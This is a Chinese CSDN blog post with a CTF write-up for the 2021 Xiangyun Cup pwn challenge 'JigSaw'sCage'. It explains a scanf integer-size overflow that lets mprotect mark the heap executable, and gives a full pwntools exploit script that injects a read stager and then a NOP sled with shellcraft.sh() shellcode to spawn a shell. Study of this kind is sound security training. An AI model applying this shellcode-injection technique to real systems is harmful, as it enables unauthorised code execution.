2021 祥云杯 pwn-JigSaw’sCage

最新推荐文章于 2022-11-08 17:26:45 发布
最新推荐文章于 2022-11-08 17:26:45 发布
阅读量253 收藏
点赞数 2
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/127357131
版权

2021 祥云杯 pwn-JigSaw’sCage

这道题属实是没有发现漏洞点在哪里,所以看了一下wm的wjh师傅的wp,发现漏洞出现下图
在这里插入图片描述
v1是int,但scanf是ld,所以溢出了4个字节,这就导致了可以控制v2的值,这样只需要将v1改成0,v2改成大于14的值即可调用mprotect分配rwx权限到heap地址上
在这里插入图片描述
并且在test功能里可以运行shellcode
在这里插入图片描述
shellcode每次只能写比较小的字节,所以得分开写,笔者一开始的思路是shellcode分段写,但是比较麻烦,wjh师傅的思路值得学习
在heap_ptrv1;这里是call rdx,前面是mov rax, 0,调试到这里看一下寄存器是什么情况
在这里插入图片描述
rdx是堆地址,rax是read的系统调用号,所以可以构造一个shellcode使得rdi为0,rsi为heap地址,rdx为0x1000,这样就是read(0, heap_addr, 0x1000)。
程序又刚好在这里执行所以可以调用shellcraft.sh()让程序在执行过程中被改成shellcraft.sh()。wjh直接用nop滑到了shellcode

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './JigSAW'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Choice : \n'

def add(index):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Index? : \n', str(index))

def edit(index, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index? : \n', str(index))
    r.sendafter('iNput:\n', content)

def test(idx):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index? : ', str(idx))

r.sendlineafter('Name:', 'z1r0')
r.sendlineafter('Make your Choice:', str(0xff00000000))

add(0)

p1 = '''
xor rdi, rdi
mov rsi, rdx
mov rdx, 0x1000
syscall
'''

edit(0, asm(p1))

test(0)

r.send(b'\x90' * 20 + asm(shellcraft.sh()))
r.interactive()
z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021-鹏城实验室-pwn-babyheap.zip
09-28
2021年鹏城实验室的pwn题,考查了libc-2.31.so下off-by-null的漏洞利用,值得学习一波。
pwn2021 祥云 (部分)
woodwhale的博客
10-07 4159
pwn2021 祥云 (部分) 前言 国庆的最后几天,一直在补题,发现祥云那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
祥云2022-unexploitable - wp
weixin_62675330的博客
11-08 531
爆破法解PWN祥云
2022祥云---crypto wp
3tefanie丶zhou的博客
11-01 583
【天底下好看的女子多了去,好看就多看一两眼,悦目养眼嘛,人之常情,可为啥要心动?】
2021祥云JigSaw‘sCage(有限制的shellcode
m0_51251108的博客
10-19 174
2021祥云JigSAW复现
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7547
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
2021 祥云 pwn-PassWordBox_ProVersion
z1r0的博客
10-16 223
这里就没有off by null了,size也只能是large bin的,那肯定就是large bin attack了,libc还是2.31的,所以笔者就直接用的ubuntu20.04自带的2.31做的。值得插一嘴的是这个key,笔者上一个free题是因为没注意\x00也会被计算,所以就造成了^ key的值不准确,这题笔者发现了这个问题后,就往后移了一个8字节,保证了key的准确性。这个函数将flags标志位设置为了1配合delete函数即可实现uaf功能。详写了2.31的large bin攻击手法。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
gris-treinamentos-pwn-2021
03-31
gris-treinamentos-pwn-2021 幻灯片浏览器
祥云部分pwn的wp
eeeeeight的博客
08-24 1221
lemon 主要问题是2.26版本下, 未控制好指针导致任意写 数据结构如下: lemon_name: lemon_content: 主要可利用的函数是color: 里的buf是指lemon_name结构, 所以可以控制指针lemon_addr的指向了, 因为只能用一次所以想控制整个tcache结构 其它一点可利用的函数: 开头的一次welcome: 虽然是有rand, 但无随机数种子, 所以是固定值, z3一把????! eat函数: 可以打印chunkaddr第四字节, 用于配合后面分配堆块 整
WP-2021祥云
ce666666的博客
01-16 659
前言 好多审计题,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的题目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这题就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
2021祥云 CTF pwn解 wp
qq_39948058的博客
08-26 1150
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
2021祥云 pwn wp
qq_39948058的博客
08-28 357
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =.
2021祥云部分pwn
weixin_46521144的博客
09-03 635
note 格式化字符串 本题考查了scanf的格式化字符串利用。一般我们用的都是printf的格式化字符串。这里是scanf 踩坑 一开始没有注意到sendline会多发一个换行符,导致往栈上$7的stdout写入的时候老是写不对,结果发现是多发了。 scanf的格式化字符利用方式和printf的比较类似,就是不能直接输出。这里注意到栈上有stdout,可以直接往里面写入绕过判断输出libc_info的fbad1800。 step1 获取libc payload1 = p64(0xfbad1800)+p6
祥云2022 writeup
渗透测试研究中心
11-02 1834
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
祥云2022 pwn - bitheap
z1r0的博客
11-01 398
需要注意的是d60这个函数,经过调试之后可以得知传入的内容需要使用二进制来表示,所以就写了一个decode。2.27下的off-by-one,其实也可以看成off-by-null。接下来就是板子直接套 2.27的off-by-null。
一个基于C语言的简易学生管理系统.zip
最新发布
06-15
C语言是一种广泛使用的编程语言,它具有高效、灵活、可移植性强等特点,被广泛应用于操作系统、嵌入式系统、数据库、编译器等领域的开发。C语言的基本语法包括变量、数据类型、运算符、控制结构(如if语句、循环语句等)、函数、指针等。在编写C程序时,需要注意变量的声明和定义、指针的使用、内存的分配与释放等问题。C语言中常用的数据结构包括: 1. 数组:一种存储同类型数据的结构,可以进行索引访问和修改。 2. 链表:一种存储不同类型数据的结构,每个节点包含数据和指向下一个节点的指针。 3. 栈:一种后进先出(LIFO)的数据结构,可以通过压入(push)和弹出(pop)操作进行数据的存储和取出。 4. 队列:一种先进先出(FIFO)的数据结构,可以通过入队(enqueue)和出队(dequeue)操作进行数据的存储和取出。 5. 树:一种存储具有父子关系的数据结构,可以通过中序遍历、前序遍历和后序遍历等方式进行数据的访问和修改。 6. 图:一种存储具有节点和边关系的数据结构,可以通过广度优先搜索、深度优先搜索等方式进行数据的访问和修改。 这些数据结构在C语言中都有相应的实现方式,可以应用于各种不同的场景。C语言中的各种数据结构都有其优缺点,下面列举一些常见的数据结构的优缺点: 数组: 优点:访问和修改元素的速度非常快,适用于需要频繁读取和修改数据的场合。 缺点:数组的长度是固定的,不适合存储大小不固定的动态数据,另外数组在内存中是连续分配的,当数组较大时可能会导致内存碎片化。 链表: 优点:可以方便地插入和删除元素,适用于需要频繁插入和删除数据的场合。 缺点:访问和修改元素的速度相对较慢,因为需要遍历链表找到指定的节点。 栈: 优点:后进先出(LIFO)的特性使得栈在处理递归和括号匹配等问题时非常方便。 缺点:栈的空间有限,当数据量较大时可能会导致栈溢出。 队列: 优点:先进先出(FIFO)的特性使得
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值